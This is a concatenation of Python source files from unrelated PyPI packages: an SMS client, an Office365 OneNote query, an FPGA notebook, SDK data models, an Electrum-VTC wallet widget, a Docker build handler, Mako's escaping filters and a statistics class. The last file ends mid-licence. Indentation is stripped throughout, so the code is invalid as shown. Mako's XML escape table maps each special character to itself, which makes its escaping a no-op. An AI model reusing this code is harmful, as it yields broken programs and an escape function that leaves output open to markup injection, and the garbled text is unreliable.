complete_apps = ['pages'] | PypiClean |
/Comilio-1.0.0.tar.gz/Comilio-1.0.0/comilio/client.py | import re
import requests
from . import exceptions
__all__ = [
'Client',
'API_URL',
'CLASSIC',
'SMART',
'SMARTPRO',
]
_NUMBER_FORMAT_REGEX = re.compile(r'^\+?[0-9]{4,14}$')
API_URL = 'https://api.comilio.it/rest/v1'
CLASSIC = 'Classic'
SMART = 'Smart'
SMARTPRO = 'SmartPro'
class Client(object):
def __init__(self, username, password):
self._auth = (username, password, )
self.default_type = CLASSIC
self.default_sender = None
self.default_recipients = None
self.raise_insufficient_credit = False
def set_default_type(self, type):
if self._check_type(type):
self.default_type = type
def set_default_sender(self, sender):
if self._check_sender(sender):
self.default_sender = sender
else:
raise exceptions.ComilioException('Sender "%s" is not valid' % sender)
def set_default_recipients(self, recipients, ignore_invalid=False):
recipients, invalid = self._check_recipients(recipients, ignore_invalid)
self.default_recipients = recipients
return invalid
def send(self, message, recipients=None, type=None, sender=None):
if not message:
raise exceptions.ComilioException('SMS message text cannot be empty')
if recipients:
recipients = self._check_recipients(recipients)[0]
else:
if not self.default_recipients:
raise exceptions.ComilioException('No recipient provided')
recipients = self.default_recipients
if type and self._check_type(type):
sms_type = type
else:
sms_type = self.default_type
payload = {
'message_type': sms_type,
'phone_numbers': recipients,
'text': message,
}
if sender:
if self._check_sender(sender):
payload['sender_string'] = sender
else:
raise exceptions.ComilioException('Sender "%s" is not valid' % sender)
elif self.default_sender:
payload['sender_string'] = self.default_sender
req = self.post('/message', payload)
if req.status_code != 200:
exc = exceptions.ComilioException('Unable to send SMS')
exc.payload = req.text
raise exc
data = req.json()
return data
def status(self, message_id):
req = self.get('/message/%s' % message_id)
if req.status_code != 200:
exc = exceptions.ComilioException('Unable to get SMS status')
exc.payload = req.text
raise exc
data = req.json()
return data
@staticmethod
def is_valid_number(number):
if _NUMBER_FORMAT_REGEX.match(number):
return True
return False
def _check_sender(self, sender):
try:
sender.encode('ascii')
if self.is_valid_number(sender) or len(sender) <= 11:
return True
return False
except UnicodeEncodeError:
return False
def _check_type(self, sms_type):
if sms_type in [CLASSIC, SMART, SMARTPRO]:
self.default_type = sms_type
else:
raise exceptions.ComilioException('Invalid message type')
def _check_recipients(self, recipients, ignore_invalid=False):
if not isinstance(recipients, list):
recipients = [recipients]
invalid = []
for recipient in recipients:
if not self.is_valid_number(recipient):
invalid.append(recipient)
recipients.remove(recipient)
if invalid:
if not ignore_invalid:
exc = exceptions.ComilioException('Some (%d) recipients were invalid' % len(invalid))
exc.payload = invalid
raise exc
return recipients, invalid
def get(self, url):
return self._send_request(url, None, 'get')
def post(self, url, data):
return self._send_request(url, data, 'post')
def _send_request(self, url, data, method):
headers = {
'Content-Type': 'application/json',
}
method = getattr(requests, method)
target_url = API_URL + url
req = method(target_url, json=data, auth=self._auth, headers=headers)
if req.status_code == 401:
raise exceptions.InvalidCredentials
if self.raise_insufficient_credit:
try:
data = req.json()
if data['error'] == 'Insufficient+credit':
raise exceptions.InsufficientCredit
except:
pass
return req | PypiClean |
/Office365-REST-Python-Client-2.4.3.tar.gz/Office365-REST-Python-Client-2.4.3/office365/onenote/internal/multipart_page_query.py | from email.message import Message
from office365.runtime.compat import get_mime_type, message_as_bytes_or_string
from office365.runtime.http.http_method import HttpMethod
from office365.runtime.queries.batch import create_boundary
from office365.runtime.queries.client_query import ClientQuery
def _message_to_payload(message):
"""
:type message: Message
"""
lf = b"\n"
crlf = b"\r\n"
payload = message_as_bytes_or_string(message)
lines = payload.split(lf)
payload = bytes.join(crlf, lines[2:]) + crlf
return payload
class OneNotePageCreateQuery(ClientQuery):
def __init__(self, pages, presentation_file, attachment_files=None):
"""
:type pages: office365.onenote.pages.collection.OnenotePageCollection
:type presentation_file: typing.IO
:type attachment_files: dict or None
"""
super(OneNotePageCreateQuery, self).__init__(pages.context, pages)
pages.context.before_execute(self._construct_multipart_request)
self._presentation = presentation_file
if attachment_files is None:
attachment_files = {}
self._files = attachment_files
def _construct_multipart_request(self, request):
"""
:type request: office365.runtime.http.request_options.RequestOptions
"""
request.method = HttpMethod.Post
boundary = create_boundary("PageBoundary", True)
request.set_header("Content-Type", "multipart/form-data; boundary={0}".format(boundary))
main_message = Message()
main_message.add_header("Content-Type", "multipart/form-data; boundary={0}".format(boundary))
main_message.set_boundary(boundary)
c_type, enc = get_mime_type(self._presentation.name)
presentation_message = Message()
presentation_message.add_header("Content-Type", c_type)
presentation_message.add_header("Content-Disposition", "form-data; name=\"Presentation\"")
presentation_message.set_payload(self._presentation.read())
main_message.attach(presentation_message)
for name, file in self._files.items():
file_message = Message()
c_type, enc = get_mime_type(file.name)
file_message.add_header("Content-Type", c_type)
file_message.add_header("Content-Disposition", "form-data; name=\"{0}\"".format(name))
file_content = file.read()
file_message.set_payload(file_content)
main_message.attach(file_message)
request.data = _message_to_payload(main_message)
@property
def return_type(self):
if self._return_type is None:
from office365.onenote.pages.page import OnenotePage
self._return_type = OnenotePage(self.context)
self.binding_type.add_child(self._return_type)
return self._return_type | PypiClean |
/Lab_3_Part1-0.0.1-py3-none-any.whl/Lab3-Part1/smul.ipynb | ```
import numpy as np
from pynq import Overlay
import pynq.lib.dma
from pynq import Xlnk
from pynq import MMIO
import time
import random
ol = Overlay('/home/xilinx/jupyter_notebooks/smul/smul.bit') # check your path
ol.download() # it downloads your bit to FPGA
dma = ol.streamMul.smul_dma # creating a dma instance. Note that we packed smul and smul_dma into streamMul
# sadd_ip = MMIO(0x43c00000, 0x10000) # we got this IP from Address Editor
sadd_ip = ol.streamMul.smul.mmio
xlnk = Xlnk()
length = 11
in_buffer = xlnk.cma_array(shape=(length,), dtype=np.int32) # input buffer
out_buffer = xlnk.cma_array(shape=(length,), dtype=np.int32) # output buffer
samples = random.sample(range(0, length), length)
np.copyto(in_buffer, samples) # copy samples to inout buffer
sadd_ip.write(0x10, length) # we got this address from Vivado source
t_start = time.time()
dma.sendchannel.transfer(in_buffer)
dma.recvchannel.transfer(out_buffer)
dma.sendchannel.wait() # wait for send channel
dma.recvchannel.wait() # wait for recv channel
t_stop = time.time()
in_buffer.close()
out_buffer.close()
print('Hardware execution time: ', t_stop-t_start)
for i in range(0, length):
print('{}*2 = {}'.format(in_buffer[i], out_buffer[i]))
ol.ip_dict
ol.streamMul.smul.
```
| PypiClean |
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/udf_field_child_py3.py |
from msrest.serialization import Model
class UDFFieldChild(Model):
"""UDFFieldChild.
:param udf_id: <span class='property-internal'>Required (defined)</span>
:type udf_id: int
:param data_type:
:type data_type: ~energycap.sdk.models.DataTypeResponse
:param name: <span class='property-internal'>Required (defined)</span>
:type name: str
:param description: <span class='property-internal'>Required
(defined)</span>
:type description: str
:param display_order: <span class='property-internal'>Required
(defined)</span>
:type display_order: int
:param value: <span class='property-internal'>Required (defined)</span>
:type value: str
:param udf_select_values: <span class='property-internal'>Required
(defined)</span>
:type udf_select_values:
list[~energycap.sdk.models.UDFSelectValueEntityResponse]
:param important: <span class='property-internal'>Required
(defined)</span>
:type important: bool
"""
_attribute_map = {
'udf_id': {'key': 'udfId', 'type': 'int'},
'data_type': {'key': 'dataType', 'type': 'DataTypeResponse'},
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'display_order': {'key': 'displayOrder', 'type': 'int'},
'value': {'key': 'value', 'type': 'str'},
'udf_select_values': {'key': 'udfSelectValues', 'type': '[UDFSelectValueEntityResponse]'},
'important': {'key': 'important', 'type': 'bool'},
}
def __init__(self, *, udf_id: int=None, data_type=None, name: str=None, description: str=None, display_order: int=None, value: str=None, udf_select_values=None, important: bool=None, **kwargs) -> None:
super(UDFFieldChild, self).__init__(**kwargs)
self.udf_id = udf_id
self.data_type = data_type
self.name = name
self.description = description
self.display_order = display_order
self.value = value
self.udf_select_values = udf_select_values
self.important = important | PypiClean |
/Electrum-VTC-2.9.3.3.tar.gz/Electrum-VTC-2.9.3.3/gui/vtc/address_list.py |
import webbrowser
from util import *
from electrum_vtc.i18n import _
from electrum_vtc.util import block_explorer_URL, format_satoshis, format_time
from electrum_vtc.plugins import run_hook
from electrum_vtc.bitcoin import is_address
class AddressList(MyTreeWidget):
filter_columns = [0, 1, 2] # Address, Label, Balance
def __init__(self, parent=None):
MyTreeWidget.__init__(self, parent, self.create_menu, [ _('Address'), _('Label'), _('Balance'), _('Tx')], 1)
self.setSelectionMode(QAbstractItemView.ExtendedSelection)
def on_update(self):
self.wallet = self.parent.wallet
item = self.currentItem()
current_address = item.data(0, Qt.UserRole).toString() if item else None
self.clear()
receiving_addresses = self.wallet.get_receiving_addresses()
change_addresses = self.wallet.get_change_addresses()
if True:
account_item = self
sequences = [0,1] if change_addresses else [0]
for is_change in sequences:
if len(sequences) > 1:
name = _("Receiving") if not is_change else _("Change")
seq_item = QTreeWidgetItem( [ name, '', '', '', ''] )
account_item.addChild(seq_item)
if not is_change:
seq_item.setExpanded(True)
else:
seq_item = account_item
used_item = QTreeWidgetItem( [ _("Used"), '', '', '', ''] )
used_flag = False
addr_list = change_addresses if is_change else receiving_addresses
for address in addr_list:
num = len(self.wallet.history.get(address,[]))
is_used = self.wallet.is_used(address)
label = self.wallet.labels.get(address,'')
c, u, x = self.wallet.get_addr_balance(address)
balance = self.parent.format_amount(c + u + x)
address_item = QTreeWidgetItem([address, label, balance, "%d"%num])
address_item.setFont(0, QFont(MONOSPACE_FONT))
address_item.setData(0, Qt.UserRole, address)
address_item.setData(0, Qt.UserRole+1, True) # label can be edited
if self.wallet.is_frozen(address):
address_item.setBackgroundColor(0, QColor('lightblue'))
if self.wallet.is_beyond_limit(address, is_change):
address_item.setBackgroundColor(0, QColor('red'))
if is_used:
if not used_flag:
seq_item.insertChild(0, used_item)
used_flag = True
used_item.addChild(address_item)
else:
seq_item.addChild(address_item)
if address == current_address:
self.setCurrentItem(address_item)
def create_menu(self, position):
from electrum_vtc.wallet import Multisig_Wallet
is_multisig = isinstance(self.wallet, Multisig_Wallet)
can_delete = self.wallet.can_delete_address()
selected = self.selectedItems()
multi_select = len(selected) > 1
addrs = [unicode(item.text(0)) for item in selected]
if not addrs:
return
if not multi_select:
item = self.itemAt(position)
col = self.currentColumn()
if not item:
return
addr = addrs[0]
if not is_address(addr):
item.setExpanded(not item.isExpanded())
return
menu = QMenu()
if not multi_select:
column_title = self.headerItem().text(col)
menu.addAction(_("Copy %s")%column_title, lambda: self.parent.app.clipboard().setText(item.text(col)))
menu.addAction(_('Details'), lambda: self.parent.show_address(addr))
if col in self.editable_columns:
menu.addAction(_("Edit %s")%column_title, lambda: self.editItem(item, col))
menu.addAction(_("Request payment"), lambda: self.parent.receive_at(addr))
if self.wallet.can_export():
menu.addAction(_("Private key"), lambda: self.parent.show_private_key(addr))
if not is_multisig and not self.wallet.is_watching_only():
menu.addAction(_("Sign/verify message"), lambda: self.parent.sign_verify_message(addr))
menu.addAction(_("Encrypt/decrypt message"), lambda: self.parent.encrypt_message(addr))
if can_delete:
menu.addAction(_("Remove from wallet"), lambda: self.parent.remove_address(addr))
addr_URL = block_explorer_URL(self.config, 'addr', addr)
if addr_URL:
menu.addAction(_("View on block explorer"), lambda: webbrowser.open(addr_URL))
if not self.wallet.is_frozen(addr):
menu.addAction(_("Freeze"), lambda: self.parent.set_frozen_state([addr], True))
else:
menu.addAction(_("Unfreeze"), lambda: self.parent.set_frozen_state([addr], False))
coins = self.wallet.get_utxos(addrs)
if coins:
menu.addAction(_("Spend from"), lambda: self.parent.spend_coins(coins))
run_hook('receive_menu', menu, addrs, self.wallet)
menu.exec_(self.viewport().mapToGlobal(position)) | PypiClean |
/FAIR-Cells-1.0.20.tar.gz/FAIR-Cells-1.0.20/fair-cells/backend/handlers/build_handler.py | import json
import os
import tempfile
import shutil
import importlib
import yaml
from typing import Optional
import docker
from notebook.base.handlers import IPythonHandler, APIHandler, HTTPError
from notebook.utils import url_path_join
from pigar.core import parse_packages
from ..container.docker_service import DockerService
from .base_handler import BaseHandler
from .environment_handler import BASE_STRING
import logging
logger = logging.getLogger('BuildHandler')
logger.setLevel(logging.DEBUG)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
logger.addHandler(ch)
def create_config(notebook_path, cell_index, variables):
return json.dumps({
'path': notebook_path,
'index': cell_index,
'variables': variables
})
class BuildHandler(BaseHandler):
def post(self, path):
notebook = self.contents_manager.get(path, content=True)
notebook_path = os.path.join(os.getcwd(), path)
notebook_name = "notebook.ipynb"
body = self.get_json_body()
image_name = body.get('imageName')
base_image = body.get('baseImage')
cell_index = int(body.get('cellIndex'))
variables = body.get('variables', {})
logging.info("image_name: " + str(image_name))
logging.info("base_image: " + str(base_image))
logging.info("cell_index: " + str(cell_index))
logging.info("variables: " + str(variables))
if image_name is None or base_image is None or cell_index is None:
raise HTTPError(400, 'abc')
requirements = body.get('environment', BASE_STRING)
# Create a temporary dir which will be our build context.
with tempfile.TemporaryDirectory() as tmpdir:
shutil.copyfile(notebook_path, tmpdir + "/" + notebook_name)
# Find the location of the FAIR-Cells module on disk
# So it can copy & install it in the container.
dirname = os.path.dirname(__file__)
nested_levels = len(__name__.split('.')) - 2
module_path = os.path.join(dirname + '/..' * nested_levels)
# Copy helper to build context.
shutil.copytree(module_path,
tmpdir + "/fair-cells/",
ignore=shutil.ignore_patterns('.ipynb_checkpoints', '__pycache__'))
with open(tmpdir + "/environment.yml", "a") as reqs:
reqs.write(requirements)
with open(tmpdir + "/environment.yml") as file:
environment = yaml.load(file, Loader=yaml.FullLoader)
lines = ''
for requ in environment['dependencies'][0]['pip']:
lines += requ + '\n'
with open(tmpdir + '/requirements.txt', 'w') as f:
f.write(lines)
f.close()
with open(tmpdir + "/nb_helper_config.json", "a") as cfg:
config = create_config(notebook_name, cell_index, variables)
cfg.write(config)
with open(tmpdir + "/.dockerignore", "a") as ignore:
ignore.write("**/backend\n")
ignore.write("**/frontend\n")
logging.info("image_name: " + str(image_name))
cc = DockerService()
try:
logging.info("Start building container")
_, log = cc.build_container(cc.get_dockerfile(base_image),tmpdir,image_name)
logging.info("Finish building container")
except docker.errors.BuildError as be:
logger.error(str(be))
logger.error(str(be.build_log))
log = be.build_log
logs = "".join([l['stream'] if 'stream' in l else '' for l in log])
self.finish(json.dumps({
'logs': logs
})) | PypiClean |
/Apiamtic_python-1.6.9-py3-none-any.whl/verizon5gmecvnspapi/models/workload.py | from verizon5gmecvnspapi.api_helper import APIHelper
from verizon5gmecvnspapi.models.repository import Repository
from verizon5gmecvnspapi.models.service_onboarding_helm_git_branch import ServiceOnboardingHelmGitBranch
from verizon5gmecvnspapi.models.service_onboarding_helm_git_tag import ServiceOnboardingHelmGitTag
from verizon5gmecvnspapi.models.service_onboarding_helm_helmrepo import ServiceOnboardingHelmHelmrepo
from verizon5gmecvnspapi.models.service_onboarding_helm_yaml_git_tag import ServiceOnboardingHelmYamlGitTag
from verizon5gmecvnspapi.models.service_onboarding_terraform_git_branch import ServiceOnboardingTerraformGitBranch
from verizon5gmecvnspapi.models.service_onboarding_terraform_git_tag import ServiceOnboardingTerraformGitTag
from verizon5gmecvnspapi.models.service_onboarding_yaml_git_branch import ServiceOnboardingYamlGitBranch
class Workload(object):
"""Implementation of the 'Workload' model.
Workload attribute of a service.
Attributes:
id (string): The auto-generated Id of the workload.
name (string): Name of the workload needs to be deployed.
description (string): A brief workload description.
package_type (ServiceDependencyPackageTypeEnum): Deployment package
type.
upload_type (UploadTypeEnum): Allowed values are: GIT files
(PULL_FROM_REPO), MANUAL_UPLOAD.
repository_type (WorkloadRepositoryTypeEnum): Repository types
allowed: GIT/HELM.
repository_id (string): In case of 'Pull files from my repository',
The user can provide the existing repositoryID.
repository (Repository): Users can create a repository to maintain
service artifacts. Repository would be either a Git or HELM
repository.
files (list of string): Files which are being generated.
revision_type (WorkloadRevisionTypeEnum): Revision type can be a
BRANCH or TAG.
helm_git_branch (ServiceOnboardingHelmGitBranch): TODO: type
description here.
helm_git_tag (ServiceOnboardingHelmGitTag): TODO: type description
here.
helm_yaml_git_tag (ServiceOnboardingHelmYamlGitTag): TODO: type
description here.
helm_helmrepo (ServiceOnboardingHelmHelmrepo): TODO: type description
here.
yaml_git_branch (ServiceOnboardingYamlGitBranch): TODO: type
description here.
terraform_git_branch (ServiceOnboardingTerraformGitBranch): TODO: type
description here.
terraform_git_tag (ServiceOnboardingTerraformGitTag): TODO: type
description here.
created_date (datetime): The date on which the workload is created.
last_modified_dte (datetime): The date when the created workload was
last modified.
created_by (string): Identity of the user who created the workload.
updated_by (string): Identity of the user who updated the workload.
"""
# Create a mapping from Model property names to API property names
_names = {
"name": 'name',
"id": 'id',
"description": 'description',
"package_type": 'packageType',
"upload_type": 'uploadType',
"repository_type": 'repositoryType',
"repository_id": 'repositoryId',
"repository": 'repository',
"files": 'files',
"revision_type": 'revisionType',
"helm_git_branch": 'helmGitBranch',
"helm_git_tag": 'helmGitTag',
"helm_yaml_git_tag": 'helmYamlGitTag',
"helm_helmrepo": 'helmHelmrepo',
"yaml_git_branch": 'yamlGitBranch',
"terraform_git_branch": 'terraformGitBranch',
"terraform_git_tag": 'terraformGitTag',
"created_date": 'createdDate',
"last_modified_dte": 'lastModifiedDte',
"created_by": 'createdBy',
"updated_by": 'updatedBy'
}
_optionals = [
'id',
'description',
'package_type',
'upload_type',
'repository_type',
'repository_id',
'repository',
'files',
'revision_type',
'helm_git_branch',
'helm_git_tag',
'helm_yaml_git_tag',
'helm_helmrepo',
'yaml_git_branch',
'terraform_git_branch',
'terraform_git_tag',
'created_date',
'last_modified_dte',
'created_by',
'updated_by',
]
_nullables = [
'description',
'package_type',
'repository_type',
'repository_id',
'files',
]
def __init__(self,
name=None,
id=APIHelper.SKIP,
description=APIHelper.SKIP,
package_type=APIHelper.SKIP,
upload_type=APIHelper.SKIP,
repository_type=APIHelper.SKIP,
repository_id=APIHelper.SKIP,
repository=APIHelper.SKIP,
files=APIHelper.SKIP,
revision_type=APIHelper.SKIP,
helm_git_branch=APIHelper.SKIP,
helm_git_tag=APIHelper.SKIP,
helm_yaml_git_tag=APIHelper.SKIP,
helm_helmrepo=APIHelper.SKIP,
yaml_git_branch=APIHelper.SKIP,
terraform_git_branch=APIHelper.SKIP,
terraform_git_tag=APIHelper.SKIP,
created_date=APIHelper.SKIP,
last_modified_dte=APIHelper.SKIP,
created_by=APIHelper.SKIP,
updated_by=APIHelper.SKIP):
"""Constructor for the Workload class"""
# Initialize members of the class
if id is not APIHelper.SKIP:
self.id = id
self.name = name
if description is not APIHelper.SKIP:
self.description = description
if package_type is not APIHelper.SKIP:
self.package_type = package_type
if upload_type is not APIHelper.SKIP:
self.upload_type = upload_type
if repository_type is not APIHelper.SKIP:
self.repository_type = repository_type
if repository_id is not APIHelper.SKIP:
self.repository_id = repository_id
if repository is not APIHelper.SKIP:
self.repository = repository
if files is not APIHelper.SKIP:
self.files = files
if revision_type is not APIHelper.SKIP:
self.revision_type = revision_type
if helm_git_branch is not APIHelper.SKIP:
self.helm_git_branch = helm_git_branch
if helm_git_tag is not APIHelper.SKIP:
self.helm_git_tag = helm_git_tag
if helm_yaml_git_tag is not APIHelper.SKIP:
self.helm_yaml_git_tag = helm_yaml_git_tag
if helm_helmrepo is not APIHelper.SKIP:
self.helm_helmrepo = helm_helmrepo
if yaml_git_branch is not APIHelper.SKIP:
self.yaml_git_branch = yaml_git_branch
if terraform_git_branch is not APIHelper.SKIP:
self.terraform_git_branch = terraform_git_branch
if terraform_git_tag is not APIHelper.SKIP:
self.terraform_git_tag = terraform_git_tag
if created_date is not APIHelper.SKIP:
self.created_date = APIHelper.RFC3339DateTime(created_date) if created_date else None
if last_modified_dte is not APIHelper.SKIP:
self.last_modified_dte = APIHelper.RFC3339DateTime(last_modified_dte) if last_modified_dte else None
if created_by is not APIHelper.SKIP:
self.created_by = created_by
if updated_by is not APIHelper.SKIP:
self.updated_by = updated_by
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object
as obtained from the deserialization of the server's response. The
keys MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
name = dictionary.get("name") if dictionary.get("name") else None
id = dictionary.get("id") if dictionary.get("id") else APIHelper.SKIP
description = dictionary.get("description") if "description" in dictionary.keys() else APIHelper.SKIP
package_type = dictionary.get("packageType") if "packageType" in dictionary.keys() else APIHelper.SKIP
upload_type = dictionary.get("uploadType") if dictionary.get("uploadType") else APIHelper.SKIP
repository_type = dictionary.get("repositoryType") if "repositoryType" in dictionary.keys() else APIHelper.SKIP
repository_id = dictionary.get("repositoryId") if "repositoryId" in dictionary.keys() else APIHelper.SKIP
repository = Repository.from_dictionary(dictionary.get('repository')) if 'repository' in dictionary.keys() else APIHelper.SKIP
files = dictionary.get("files") if "files" in dictionary.keys() else APIHelper.SKIP
revision_type = dictionary.get("revisionType") if dictionary.get("revisionType") else APIHelper.SKIP
helm_git_branch = ServiceOnboardingHelmGitBranch.from_dictionary(dictionary.get('helmGitBranch')) if 'helmGitBranch' in dictionary.keys() else APIHelper.SKIP
helm_git_tag = ServiceOnboardingHelmGitTag.from_dictionary(dictionary.get('helmGitTag')) if 'helmGitTag' in dictionary.keys() else APIHelper.SKIP
helm_yaml_git_tag = ServiceOnboardingHelmYamlGitTag.from_dictionary(dictionary.get('helmYamlGitTag')) if 'helmYamlGitTag' in dictionary.keys() else APIHelper.SKIP
helm_helmrepo = ServiceOnboardingHelmHelmrepo.from_dictionary(dictionary.get('helmHelmrepo')) if 'helmHelmrepo' in dictionary.keys() else APIHelper.SKIP
yaml_git_branch = ServiceOnboardingYamlGitBranch.from_dictionary(dictionary.get('yamlGitBranch')) if 'yamlGitBranch' in dictionary.keys() else APIHelper.SKIP
terraform_git_branch = ServiceOnboardingTerraformGitBranch.from_dictionary(dictionary.get('terraformGitBranch')) if 'terraformGitBranch' in dictionary.keys() else APIHelper.SKIP
terraform_git_tag = ServiceOnboardingTerraformGitTag.from_dictionary(dictionary.get('terraformGitTag')) if 'terraformGitTag' in dictionary.keys() else APIHelper.SKIP
created_date = APIHelper.RFC3339DateTime.from_value(dictionary.get("createdDate")).datetime if dictionary.get("createdDate") else APIHelper.SKIP
last_modified_dte = APIHelper.RFC3339DateTime.from_value(dictionary.get("lastModifiedDte")).datetime if dictionary.get("lastModifiedDte") else APIHelper.SKIP
created_by = dictionary.get("createdBy") if dictionary.get("createdBy") else APIHelper.SKIP
updated_by = dictionary.get("updatedBy") if dictionary.get("updatedBy") else APIHelper.SKIP
# Return an object of this model
return cls(name,
id,
description,
package_type,
upload_type,
repository_type,
repository_id,
repository,
files,
revision_type,
helm_git_branch,
helm_git_tag,
helm_yaml_git_tag,
helm_helmrepo,
yaml_git_branch,
terraform_git_branch,
terraform_git_tag,
created_date,
last_modified_dte,
created_by,
updated_by) | PypiClean |
/Mako-1.2.4.tar.gz/Mako-1.2.4/mako/filters.py |
import codecs
from html.entities import codepoint2name
from html.entities import name2codepoint
import re
from urllib.parse import quote_plus
import markupsafe
html_escape = markupsafe.escape
xml_escapes = {
"&": "&",
">": ">",
"<": "<",
'"': """, # also " in html-only
"'": "'", # also ' in html-only
}
def xml_escape(string):
return re.sub(r'([&<"\'>])', lambda m: xml_escapes[m.group()], string)
def url_escape(string):
# convert into a list of octets
string = string.encode("utf8")
return quote_plus(string)
def trim(string):
return string.strip()
class Decode:
def __getattr__(self, key):
def decode(x):
if isinstance(x, str):
return x
elif not isinstance(x, bytes):
return decode(str(x))
else:
return str(x, encoding=key)
return decode
decode = Decode()
class XMLEntityEscaper:
def __init__(self, codepoint2name, name2codepoint):
self.codepoint2entity = {
c: str("&%s;" % n) for c, n in codepoint2name.items()
}
self.name2codepoint = name2codepoint
def escape_entities(self, text):
"""Replace characters with their character entity references.
Only characters corresponding to a named entity are replaced.
"""
return str(text).translate(self.codepoint2entity)
def __escape(self, m):
codepoint = ord(m.group())
try:
return self.codepoint2entity[codepoint]
except (KeyError, IndexError):
return "&#x%X;" % codepoint
__escapable = re.compile(r'["&<>]|[^\x00-\x7f]')
def escape(self, text):
"""Replace characters with their character references.
Replace characters by their named entity references.
Non-ASCII characters, if they do not have a named entity reference,
are replaced by numerical character references.
The return value is guaranteed to be ASCII.
"""
return self.__escapable.sub(self.__escape, str(text)).encode("ascii")
# XXX: This regexp will not match all valid XML entity names__.
# (It punts on details involving involving CombiningChars and Extenders.)
#
# .. __: http://www.w3.org/TR/2000/REC-xml-20001006#NT-EntityRef
__characterrefs = re.compile(
r"""& (?:
\#(\d+)
| \#x([\da-f]+)
| ( (?!\d) [:\w] [-.:\w]+ )
) ;""",
re.X | re.UNICODE,
)
def __unescape(self, m):
dval, hval, name = m.groups()
if dval:
codepoint = int(dval)
elif hval:
codepoint = int(hval, 16)
else:
codepoint = self.name2codepoint.get(name, 0xFFFD)
# U+FFFD = "REPLACEMENT CHARACTER"
if codepoint < 128:
return chr(codepoint)
return chr(codepoint)
def unescape(self, text):
"""Unescape character references.
All character references (both entity references and numerical
character references) are unescaped.
"""
return self.__characterrefs.sub(self.__unescape, text)
_html_entities_escaper = XMLEntityEscaper(codepoint2name, name2codepoint)
html_entities_escape = _html_entities_escaper.escape_entities
html_entities_unescape = _html_entities_escaper.unescape
def htmlentityreplace_errors(ex):
"""An encoding error handler.
This python codecs error handler replaces unencodable
characters with HTML entities, or, if no HTML entity exists for
the character, XML character references::
>>> 'The cost was \u20ac12.'.encode('latin1', 'htmlentityreplace')
'The cost was €12.'
"""
if isinstance(ex, UnicodeEncodeError):
# Handle encoding errors
bad_text = ex.object[ex.start : ex.end]
text = _html_entities_escaper.escape(bad_text)
return (str(text), ex.end)
raise ex
codecs.register_error("htmlentityreplace", htmlentityreplace_errors)
DEFAULT_ESCAPES = {
"x": "filters.xml_escape",
"h": "filters.html_escape",
"u": "filters.url_escape",
"trim": "filters.trim",
"entity": "filters.html_entities_escape",
"unicode": "str",
"decode": "decode",
"str": "str",
"n": "n",
} | PypiClean |
/Gaussian_and_Binomial_sethhamilton94-0.1.tar.gz/Gaussian_and_Binomial_sethhamilton94-0.1/Gaussian_and_Binomial_sethhamilton94/Binomialdistribution.py | import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
TODO: Fill out all functions below
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n) | PypiClean |
/NearPy-0.2.2.tar.gz/NearPy-0.2.2/nearpy/experiments/distanceratioexperiment.py |
# Copyright (c) 2013 Ole Krause-Sparmann
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
